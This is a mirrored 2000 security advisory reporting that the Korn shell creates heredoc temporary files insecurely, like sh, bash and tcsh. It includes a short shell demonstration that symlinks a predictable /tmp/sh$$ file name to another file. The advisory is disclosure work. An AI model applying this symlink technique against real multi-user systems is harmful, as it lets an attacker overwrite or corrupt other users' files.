Lucene search
K

ksh.temp-hole.txt

🗓️ 22 Dec 2000 00:00:00Reported by Paul SzaboType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

ksh is vulnerable to insecure temporary file creation like other shells, posing a security risk.

Code
` Author: Paul Szabo < [email protected] >  
  
Recently I reported that, similarly to the recently discussed tcsh  
vulnerability, the Bourne shell /bin/sh creates temporary files in an  
insecure way:  
  
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.N  
[email protected]  
  
At the time I also tested the Korn shell ksh, and it seemed safe... but no,  
ksh is in fact also vulnerable. (Is this all shells? We have seen tcsh,  
bash, sh and now ksh fail...)  
  
Demonstration (ksh is vulnerable if the size of silly.1 is changed):  
  
#!/bin/ksh -x  
touch /tmp/silly.1  
ln -s /tmp/silly.1 /tmp/sh$$.1  
ls -l /tmp/silly.* /tmp/sh$$.*  
cat <<EOF  
Just some short text  
EOF  
ls -l /tmp/silly.* /tmp/sh$$.*  
rm /tmp/silly.* /tmp/sh$$.*  
  
Paul Szabo - [email protected] http://www.maths.usyd.edu.au:8000/u/psz/  
School of Mathematics and Statistics University of Sydney 2006 Australia  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation